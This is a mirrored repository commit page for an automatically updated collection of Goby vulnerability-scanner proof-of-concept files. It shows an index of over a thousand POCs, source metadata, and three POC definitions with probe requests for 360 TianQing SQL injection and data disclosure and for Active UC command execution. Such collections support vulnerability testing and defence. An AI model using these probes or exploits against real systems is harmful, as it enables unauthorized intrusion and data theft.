qwqdanchun
/
Goby
mirror of https://github.com/qwqdanchun/Goby.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

auto

This commit is contained in:
test 2023-05-12 05:11:32 +00:00
parent 44ea24f39d
commit 72b29aaee0
42 changed files with 1859 additions and 782 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

82
README.md
View File

@ -1,47 +1,47 @@
## goby poc (共1112个) 最近一次检查时间 2023-05-11 05:10:39
## goby poc (共1112个) 最近一次检查时间 2023-05-12 05:11:32
### 收集记录
| 文件名称 | 收录时间 |
| :----| :---- |
| [Samsung_WLAN_AP_WEA453e_RCE.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [DedeCMS_Carbuyaction_FileInclude.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [fahuo100_sql_injection_CNVD_2021_30193.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [360_Tianqing_database_information_disclosure.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [VENGD_Arbitrary_File_Upload.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [Discuz_Wechat_Plugins_Unauth.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [H3C_IMC_RCE.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [SonarQube_unauth_CVE_2020_27986.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [IceWarp_WebClient_basic_RCE.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [Jitong_EWEBS_phpinfo_leak.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [Active_UC_index.action_RCE.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [Security_Devices_Hardcoded_Password.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [GitLab_SSRF_CVE_2021_22214.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [VMWare_Operations_vRealize_Operations_Manager_API<br>_SSRF_CVE_2021_21975.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [Discuz_RCE_WOOYUN_2010_080723.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [Atlassian_Confluence_OGNL_injection_CVE_2021_2608<br>4.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [alibaba_canal_default_password.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [IRDM4000_Smart_station_Unauthorized_access.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [Fastmeeting_Arbitrary_File_Read.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [YAPI_RCE.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [Consul_Rexec_RCE.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [Apache_Airflow_Unauthorized.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [VMware_vCenter_v7.0.2_Arbitrary_File_Read.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [Discuz_v72_SQLI.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [FineReport_v9_Arbitrary_File_Overwrite.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [Apache_Kylin_Unauthorized_configuration_disclosur<br>e.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [360_TianQing_ccid_SQL_injectable.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [Datang_AC_Default_Password.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [Docker_Registry_API_Unauth.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [Konga_Default_JWT_KEY.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [Aspcms_Backend_Leak.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [ClickHouse_SQLI.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [Apache_Kylin_Console_Default_password.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [Weaver_OA_8_SQL_injection.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [Lanproxy_Directory_traversal_CVE_2021_3019.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [Cacti_Weathermap_File_Write.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [Alibaba_Nacos_Add_user_not_authorized.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [RuoYi_Druid_Unauthorized_access.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [Alibaba_Nacos_Default_password.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [OpenSNS_RCE.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [360_Tianqing_database_information_disclosure.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [VENGD_Arbitrary_File_Upload.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Discuz_Wechat_Plugins_Unauth.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [H3C_IMC_RCE.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [SonarQube_unauth_CVE_2020_27986.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [IceWarp_WebClient_basic_RCE.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Jitong_EWEBS_phpinfo_leak.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Active_UC_index.action_RCE.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Security_Devices_Hardcoded_Password.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [GitLab_SSRF_CVE_2021_22214.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [VMWare_Operations_vRealize_Operations_Manager_API<br>_SSRF_CVE_2021_21975.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Discuz_RCE_WOOYUN_2010_080723.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Atlassian_Confluence_OGNL_injection_CVE_2021_2608<br>4.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [alibaba_canal_default_password.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [IRDM4000_Smart_station_Unauthorized_access.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Fastmeeting_Arbitrary_File_Read.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [YAPI_RCE.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Consul_Rexec_RCE.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Apache_Airflow_Unauthorized.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [VMware_vCenter_v7.0.2_Arbitrary_File_Read.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Discuz_v72_SQLI.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [FineReport_v9_Arbitrary_File_Overwrite.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Apache_Kylin_Unauthorized_configuration_disclosur<br>e.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [360_TianQing_ccid_SQL_injectable.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Datang_AC_Default_Password.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Docker_Registry_API_Unauth.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Konga_Default_JWT_KEY.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Aspcms_Backend_Leak.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [ClickHouse_SQLI.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Apache_Kylin_Console_Default_password.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Weaver_OA_8_SQL_injection.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Lanproxy_Directory_traversal_CVE_2021_3019.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Cacti_Weathermap_File_Write.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Alibaba_Nacos_Add_user_not_authorized.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [RuoYi_Druid_Unauthorized_access.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Alibaba_Nacos_Default_password.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [OpenSNS_RCE.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Samsung_WLAN_AP_WEA453e_RCE.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:41 |
| [DedeCMS_Carbuyaction_FileInclude.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:41 |
| [fahuo100_sql_injection_CNVD_2021_30193.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:41 |
| [Samsung_WLAN_AP_wea453e_router_RCE.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-04-20 05:12:18 |
| [Jellyfin_10.7.0_Unauthenticated_Abritrary_File_Re<br>ad_CVE_2021_21402.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-04-20 05:12:18 |
| [poc.go](https://github.com/hanc00l/pocGoby2Xray) | 2023-04-20 05:12:18 |

240
data.json
View File

@ -5359,204 +5359,204 @@
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-04-20 05:12:18"
},
"465626f5ffd33c92d2b540083c0fc479": {
"db406159976a18c09450d5e134706387": {
"name": "Samsung_WLAN_AP_WEA453e_RCE.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:41"
},
"c22a7eded164de18b9b08b1073c24a48": {
"513fef84b397b9714253b3b368179e20": {
"name": "DedeCMS_Carbuyaction_FileInclude.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:41"
},
"3e8c98edb79eb77daa6b45d8d70f03a3": {
"919d80e8c84e30fd9638679cdee90caa": {
"name": "fahuo100_sql_injection_CNVD_2021_30193.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:41"
},
"b1ae8cb2f529f5eee60bf5c30d1e2df0": {
"1afa191a8421b3c5bc7c4da97b6235bc": {
"name": "360_Tianqing_database_information_disclosure.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"cac943f12f9ed2f205014ff87fbbc35b": {
"55ad80db239956a843223438a850ac04": {
"name": "VENGD_Arbitrary_File_Upload.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"4e566c87e02a8d2eae142e7f2c57e962": {
"566c622e106572be52c49ea3fc279874": {
"name": "Discuz_Wechat_Plugins_Unauth.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"b69a1315894702869a7e904234655abf": {
"cd97b511ed98de73cc7b9c89e9f48218": {
"name": "H3C_IMC_RCE.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"434ec564211e33791d5e1961f1b3ebb8": {
"f01ced36d8b3caefb829354bd6fd7fc1": {
"name": "SonarQube_unauth_CVE_2020_27986.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"5e17ce4d593835c34fc2ed48eb6ff481": {
"41237e0d7696201d59664dd219abd3cb": {
"name": "IceWarp_WebClient_basic_RCE.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"30e31bbcb3e3a1c3e726c8712dc9a413": {
"1386b44e85f2afe55acb33cdc6dd26e5": {
"name": "Jitong_EWEBS_phpinfo_leak.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"87adadd634cc919ad6b5e7b4842bb35e": {
"c07ba5da657d52f1ee2bf6104750c3f4": {
"name": "Active_UC_index.action_RCE.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"33322c6293c00e0177f01ac3889dd0e9": {
"fcbf0d616b0057f605aec56bedf7f368": {
"name": "Security_Devices_Hardcoded_Password.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"49963f2392dff43d6ba9478a39ef9b54": {
"1114c43aff54e07c9c7bc5511f86a154": {
"name": "GitLab_SSRF_CVE_2021_22214.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"a95b89986a79c91a7f59d9d75ec942ac": {
"698f8ae7a4aff0669896491d060b9d0f": {
"name": "VMWare_Operations_vRealize_Operations_Manager_API_SSRF_CVE_2021_21975.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"cae0710ea595f0910a36af1981e6e296": {
"0adbc3de8b02a58343f6a3fc5eabda45": {
"name": "Discuz_RCE_WOOYUN_2010_080723.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"536988b739b6d41934e36855a7f359ee": {
"5862dcc3f7516a20a57490e6fa4d7690": {
"name": "Atlassian_Confluence_OGNL_injection_CVE_2021_26084.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"50b9e8e21d6f76d37b80f189ed8664d1": {
"5a1f57f97b1337ac13f038768b9c46e5": {
"name": "alibaba_canal_default_password.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"f05c778d0dec965304b0652b2ecadc46": {
"68ba57a4bd670c0c42c35d21e4f5dc26": {
"name": "IRDM4000_Smart_station_Unauthorized_access.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"e4a9fa38a80c8efb2728562e7f347ba5": {
"d50c1b89c61b3b68b5d1181a6841af52": {
"name": "Fastmeeting_Arbitrary_File_Read.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"87a7cd5e962fbfbaf8d239ba4471ba25": {
"f4b060111ff19956236844be0e0d0eef": {
"name": "YAPI_RCE.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"b3c4ed50cda74c9f027bd85463dc5986": {
"fed516d8fa1974abb4ac2f1fd3d80800": {
"name": "Consul_Rexec_RCE.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"ec3a00491923a14f6cb1d9d44c09c6ac": {
"00e57ee9b2dd0e50d2d41464d79b05f1": {
"name": "Apache_Airflow_Unauthorized.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"5b6f0bfa4927b535a749e3d7f76faca4": {
"3b1db00d2d2247346b3f1d417569b8ce": {
"name": "VMware_vCenter_v7.0.2_Arbitrary_File_Read.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"cd7c79c4a8f5954dfc9b94e5572cf7a8": {
"96d085787d489b574554b16d4faa9882": {
"name": "Discuz_v72_SQLI.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"63e384aaef52dc2beac087d21740d2ea": {
"5fcf6c18ba2d72c0c7ae722c9e76a517": {
"name": "FineReport_v9_Arbitrary_File_Overwrite.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"bdd6387e6ebfdc1d155e0d80a4afe068": {
"d6bad5f70686858fd05c9e312dfabdb6": {
"name": "Apache_Kylin_Unauthorized_configuration_disclosure.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"8f0b5dc58420ec1e6bf9d5eebb198546": {
"c667250e8ec2a946aaaee7879a88a541": {
"name": "360_TianQing_ccid_SQL_injectable.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"534f7819797de150b1c0411dd4a2c869": {
"52266baa33db1cf175f371903e5a1aa9": {
"name": "Datang_AC_Default_Password.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"12dc028570c676ed6304d2b56f219c1e": {
"9f64f2d8bf3a124e1ebf2d4395870ca0": {
"name": "Docker_Registry_API_Unauth.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"63e7fcd14c98d13658565ac3aa5126f0": {
"8211bdcd16f68a1fb2549e5df9e4f3c7": {
"name": "Konga_Default_JWT_KEY.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"79733cc4aef1d73f095647ddd6902224": {
"85c8494e7b893bc0b65badffbc549556": {
"name": "Aspcms_Backend_Leak.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"9ab5251e9bd107631260838907f894be": {
"4d77792cc7287d63774faee7f1395bef": {
"name": "ClickHouse_SQLI.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"eccacf2cea1bb6a40088b1f9e43fe595": {
"c53bd0683e3ae4a6181040f5952445dd": {
"name": "Apache_Kylin_Console_Default_password.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"0b8fcbde235a2adad1aff3dc1080467e": {
"4c4cbf98683b8bfadc80ee4231dbb779": {
"name": "Weaver_OA_8_SQL_injection.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"e646ceb6b2a9ec480bbd4623d4325f32": {
"9e734128624dc8dd76a46831a7e9721a": {
"name": "Lanproxy_Directory_traversal_CVE_2021_3019.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"4181aeaee11b9ea93856a49a8e0159be": {
"8b236a6f58657465085590d4b5c1e244": {
"name": "Cacti_Weathermap_File_Write.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"9d9add12c6a10caa7b95737ddc272dad": {
"937d584fb24d1ab86aea5cfbe2300af8": {
"name": "Alibaba_Nacos_Add_user_not_authorized.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"2f341afe61cba3b5b2104d60e41083b2": {
"01f0fb1ab3f35ddf53969011a3553c07": {
"name": "RuoYi_Druid_Unauthorized_access.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"b5a392b27a98471d7a85fceb83f8c2bb": {
"bdd884a8409510102c311e67bf8fbf35": {
"name": "Alibaba_Nacos_Default_password.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"c11dc72c6b76260ea064ec6d065c2c4e": {
"ddaeaa89570178bc8ac021dee5c446a2": {
"name": "OpenSNS_RCE.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
}
}

69
poc/360_TianQing_ccid_SQL_injectable.json
View File

@ -1,17 +1,23 @@
{
"Name": "360 TianQing ccid SQL injectable",
"Level": "2",
"Tags": [],
"GobyQuery": "app=\"360-TianQing\"",
"Description": "The attacker can get the server permission by injecting SQL into the upload Trojan",
"Product": "360 TianQing",
"Homepage": "htp://360.cn",
"Author": "PeiQi",
"Impact": "<p>The attacker can get the server permission by injecting SQL into the upload Trojan<br></p>",
"Recommandation": "",
"References": [
"http://wiki.peiqi.tech"
"Tags": [
"sqli"
],
"GobyQuery": "app=\"360-TianQing\"",
"Description": "",
"Product": "360 TianQing",
"Homepage": "https://360.net/product-center/Endpoint-Security/management-system",
"Author": "",
"Impact": "The attacker can get the server permission by injecting SQL into the upload Trojan.",
"Recommendation": "update",
"References": [],
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
@ -19,7 +25,7 @@
"method": "GET",
"uri": "/api/dp/rptsvcsyncpoint?ccid=1",
"follow_redirect": true,
"header": {},
"header": null,
"data_type": "text",
"data": ""
},
@ -60,6 +66,43 @@
"SetVariable": []
}
],
"PostTime": "2021-04-09 08:51:50",
"GobyVersion": "1.8.255"
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}

67
poc/360_Tianqing_database_information_disclosure.json
View File

@ -1,19 +1,23 @@
{
"Name": "360 Tianqing database information disclosure",
"Name": "360 TianQing database information disclosure",
"Level": "0",
"Tags": [
"Disclosure of Sensitive Information"
],
"GobyQuery": "app=\"360-TianQing\"",
"Description": "Tianqing has unauthorized unauthorized unauthorized access, resulting in the disclosure of sensitive information",
"Product": "360 Tianqing",
"Homepage": "https://www.360.cn/",
"Author": "PeiQi",
"Impact": "",
"Recommandation": "<p>undefined</p>",
"References": [
"http://wiki.peiqi.tech"
],
"Description": "",
"Product": "360 TianQing",
"Homepage": "https://360.net/product-center/Endpoint-Security/management-system",
"Author": "",
"Impact": "Tianqing has unauthorized unauthorized unauthorized access, resulting in the disclosure of sensitive information.",
"Recommendation": "update",
"References": [],
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
@ -21,7 +25,7 @@
"method": "GET",
"uri": "/api/dbstat/gettablessize",
"follow_redirect": false,
"header": {},
"header": null,
"data_type": "text",
"data": ""
},
@ -62,6 +66,43 @@
"SetVariable": []
}
],
"PostTime": "2021-04-08 16:04:28",
"GobyVersion": "1.8.255"
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}

53
poc/Active_UC_index.action_RCE.json
View File

@ -1,28 +1,29 @@
{
"Name": "Active UC index.action 远程命令执行漏洞",
"Name": "Active UC index.action RCE",
"Level": "3",
"Tags": [
"RCE"
],
"GobyQuery": "title=\"网动统一通信平台(Active UC)\"",
"Description": "网动统一通信平台 Active UC index.action 存在S2-045远程命令执行漏洞, 通过漏洞可以执行任意命令",
"Product": "网动统一通信平台(Active UC)",
"Homepage": "https://gobies.org/",
"Author": "luckying",
"Impact": "",
"Recommandation": "",
"References": [
"https://gobies.org/"
"Description": "",
"Product": "Active UC",
"Homepage": "http://www.iactive.com.cn/",
"Author": "",
"Impact": "Active UC index.action has a RCE vulnerability.",
"Recommendation": "update",
"References": [],
"HasExp": true,
"ExpParams": [
{
"Name": "cmd",
"Type": "input",
"Value": "whoami"
}
],
"HasExp": true,
"ExpParams": [
{
"name": "Cmd",
"type": "input",
"value": "whoami",
"show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
@ -41,7 +42,7 @@
"Pragma": "no-cache"
},
"data_type": "text",
